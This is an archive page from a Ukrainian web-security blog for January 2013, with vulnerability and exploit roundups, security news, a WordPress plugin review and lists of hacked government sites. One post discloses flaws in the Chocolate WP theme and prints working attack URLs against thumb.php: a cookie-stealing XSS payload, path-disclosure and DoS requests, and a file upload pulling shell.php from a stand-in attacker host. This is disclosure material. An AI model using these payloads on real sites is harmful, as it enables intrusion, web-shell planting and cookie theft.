Архів за Січень, 2013

Добірка уразливостей

16:24 25.01.2013

В даній добірці уразливості в веб додатках:

  • Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities (деталі)
  • CubeCart 4.4.6 and lower | Cross Site Request Forgery (CSRF) Vulnerability (деталі)
  • CubeCart 4.4.6 and lower | Multiple Cross Site Scripting Vulnerabilities (деталі)
  • squidGuard 1.4 - Remote Denial of Service - POC (деталі)
  • CubeCart 4.4.6 and lower | Multiple SQL Injection Vulnerabilities (деталі)
  • CubeCart 4.4.6 and lower | Local File Inclusion Vulnerability (деталі)
  • libGData, evolution-data-server vulnerability (деталі)
  • CubeCart 4.x/5.x | Setup Re-installation Privilege Escalation Vulnerability (деталі)
  • zendframework security update (деталі)
  • Cross-Site Scripting (XSS) vulnerability in Quick.Cms and Quick.Cart (деталі)

Численні уразливості в темі Chocolate WP для WordPress

23:58 24.01.2013

Вчора я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Chocolate WP для WordPress. Про що вже повідомив розробникам.

XSS (WASC-08) (в старих версіях TimThumb):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3C111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Уразливі всі версії теми Chocolate WP для WordPress.

Cloudsafe365 - безпека для WordPress

22:42 24.01.2013

Серед різних секюріті плагінів для WordPress, про деякі з них я вже розповідав, як то Wordfence, існує такий плагін як Cloudsafe365.

Раніше я вже писав про уразливість в Cloudsafe365.

Сам плагін Cloudsafe365 для WordPress є безкоштовним. Але є додаткові функції, які можна придбати на офіційному сайті. Для цього на сайті http://www.cloudsafe365.com потрібно підписатися на платну версію. Всього існує дві платні версії: Plus і Pro, що включають всі можливості Basic версії та багато інших функцій (при цьому версія Pro знаходиться в розробці й лише анонсована на сайті, доступною вона стане пізніше).

Cloudsafe365 представляє собою хмарний сервіс, реалізований у вигляді плагіна для WP. Він має чимало можливостей (особливо в платній версії), з яких виділю головні.

  • Автоматичний бекап сайта.
  • Захист від багатьох уразливостей.
  • Захист контенту (щоб його було важче вкрасти, але це не захистить повністю, лише від автоматизованого копіювання контенту з сайта).
  • Антивірусний сканер (сканування malware на сайтах).
  • Моніторинг в реальному часі.

По наявності функції сканування malware на сайтах цей сервіс є безпосереднім конкурентом моїй Web VDS. По функції захисту від атак та уразливостей він подібний до вищезгаданого Wordfence та багатьох інших плагінів до WP, про які я вже писав.

Use-after-free уразливість в Microsoft Internet Explorer

20:33 24.01.2013

Можливе використання пам’яті після звільнення в Microsoft Internet Explorer

Уразливі продукти: Microsoft Internet Explorer 6, 7, 8 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7.

Використання пам’яті після звільнення в CButton використовується in-the-wild для встановлення шкідливого коду.

  • Microsoft Security Bulletin MS13-008 - Critical Security Update for Internet Explorer (2799329) (деталі)

Добірка експлоітів

17:26 24.01.2013

В даній добірці експлоіти в веб додатках:

  • SurgeFTP Remote Command Execution Vulnerability (деталі)
  • Foswiki MAKETEXT Remote Command Execution Vulnerability (деталі)
  • TWiki MAKETEXT Remote Command Execution Vulnerability (деталі)
  • TVMOBiLi Media Server 2.1.0.3557 Denial Of Service (деталі)
  • Opera Web Browser 12.11 Crash PoC (деталі)

Уразливості в плагінах для WordPress №88

23:58 23.01.2013

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Myflash, Clockstone та WP Property. Для котрих з’явилися експлоіти. Myflash - це плагін для створення слайдшоу з флешек, Clockstone - це тема движка, WP Property - це плагін для управління списками майна та нерухомості.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Як хакнути мільйони роутерів

22:41 23.01.2013

Продовжуючи розпочату традицію, після попереднього відео про нові шляхи взлому веб додатків, пропоную нове відео на веб секюріті тематику. Цього разу відео про те, як хакнути мільйони роутерів. Рекомендую подивитися всім хто цікавиться цією темою.

Defcon 18 - How to hack millions of routers

Два з половиною роки тому на конференції DEFCON 18 відбувся виступ Craig Heffner. В своєму виступі він розповів про уразливості в роутерах та їх експлуатацію. Зокрема він розповім про атаки на роутери з використанням Cross-Site Request Forgery та DNS Rebinding. З використанням даних методів атак, можна захопити контроль над різними мережевими пристроями (з функцією роутера), яких сотні мільйонів по всьому світу.

Про ці методи, як про CSRF атаки, так і про про DNS Rebinding я вже писав. Про CSRF атаки на модеми і точки доступу я написав власну статтю CSRF Attacks on Network Devices та наводив чимало таких уразливостей в різних пристроях, а про DNS Rebinding я наводив різноманітні статті й відео від RSnake. Рекомендую подивитися дане відео для розуміння векторів атак на мережеві пристрої.

Похакані сайти №214

20:11 23.01.2013

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://sumy-g.upszn-sumy.gov.ua (хакером hatrk) - 11.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://bogodukhivrda.gov.ua (хакером DR-MTMRD) - 18.10.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://vinjust.gov.ua (хакером Nob0dy) - 22.10.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://www.formulove.com.ua (хакером Badi) - 12.01.2013, зараз сайт вже виправлений адмінами
  • http://ufb.org.ua (хакером Badi) - 12.01.2013, зараз сайт вже виправлений адмінами

Уразливості на zpd.gov.ua

17:21 23.01.2013

21.07.2012

Сьогодні я знайшов Cross-Site Scripting уразливості на http://zpd.gov.ua - сайті Державної служби України з питань захисту персональних даних. Про що найближчим часом сповіщу адміністрацію сайта.

Сайт використовує Megapolis.Portal Manager, в якому я виявив багато уразливостей (з 2006 по 2012 рік я знайшов чимало дірок в цьому движку). Тому й на ньому також є дірки подібно до сайтів Кабміну, Парламенту та іншим державним сайтам.

І це сайт тієї служби, що захищає персональні дані українців. Риторичне запитання: раз ця служба штрафує за недотримання закону про захист персональних даних, то чи оштрафує вона сама себе, якщо через дірки на їхньому сайті станеться витік персональних даних.

Детальна інформація про уразливості з’явиться пізніше.

23.01.2013

XSS:

Дані уразливості досі не виправлені. Якщо ця служба не може убезпечити власний сайт, то навряд чи вона зможе убезпечити персональні дані громадян України.

Новини: прогноз Symantec, затриманий DDoS-ер та аналіз парольних фраз

22:45 22.01.2013

За повідомленням www.xakep.ru, прогноз Symantec по кіберзагрозам на 2013 рік.

Експерти Symantec опублікували прогноз основних тенденцій у світі інформаційної безпеки, що можуть виявити себе в 2013 році. Прогноз складений за результатами обговорення із сотнями штатних і незалежних експертів, так що це не суб’єктивна думка однієї людини, а результат колективного “мозкового штурму”, з урахуванням розвитку ринку в останні роки.

П’ятірка прогнозів від Symantec:

1. Кіберконфлікти стануть звичайною справою.
2. Шкідливі програми з вимогою оплати.
3. Мобільні рекламні віруси стануть набагато популярніше.
4. Монетизація соціальних мереж обіцяє нові небезпеки.
5. Користувачі переходять на мобільні пристрої та в хмару, за ними йдуть і кіберзлочинці.

За повідомленням ain.ua, у Києві затримали хакера, що займався DDoS-атаками на замовлення.

Київська міліція затримала підозрюваного, що проводив DDoS-атаки на українські й закордонні сайти комерційних організацій за замовленням конкурентів - в основному, російські ресурси. Усього йому вдалося провести близько 50 атак.

За заявою головного інспектора відділу по виявленню злочинів у сфері платіжних систем і інформаційної безпеки МВС Богдана Тищенко, це перший випадок затримки хакера, що працював за замовленням. Міліції також удалося встановити, що киянин підтримував зв’язки з міжнародним хакерським рухом.

Це МВС вперше спіймала такого діяча. В 2009 році СБУ вже спіймала DDoS-ера у Дніпропетровську.

За повідомленням www.xakep.ru, аналіз граматичних залежностей у парольній фразі.

Учені з Карнегі-Меллона опублікували цікаве дослідження, у якому оприлюднили результати аналізу алгоритму для взлому довгих парольних фраз, складених з декількох слів, таких як thispasswordrules чи abiggerbetterpassword. Учені склали граф сполучуваності різних слів один з одним. Виявилося, що в мові не так вже багато комбінацій слів: за одним конкретним словом майже завжди випливає обмежена кількість інших, цілком визначених, слів. Існує тверда граматична залежність частин парольної фрази.

Довгі паролі з 20-25 символів звичайно вважаються стійкими до брутфорсу, але при використанні алгоритмів з аналізом граматичних зв’язків вони підбираються набагато швидше. Учені розробили Proof-of-concept алгоритм для “взлому” граматичних конструкцій і збільшення ефективності атаки по словнику.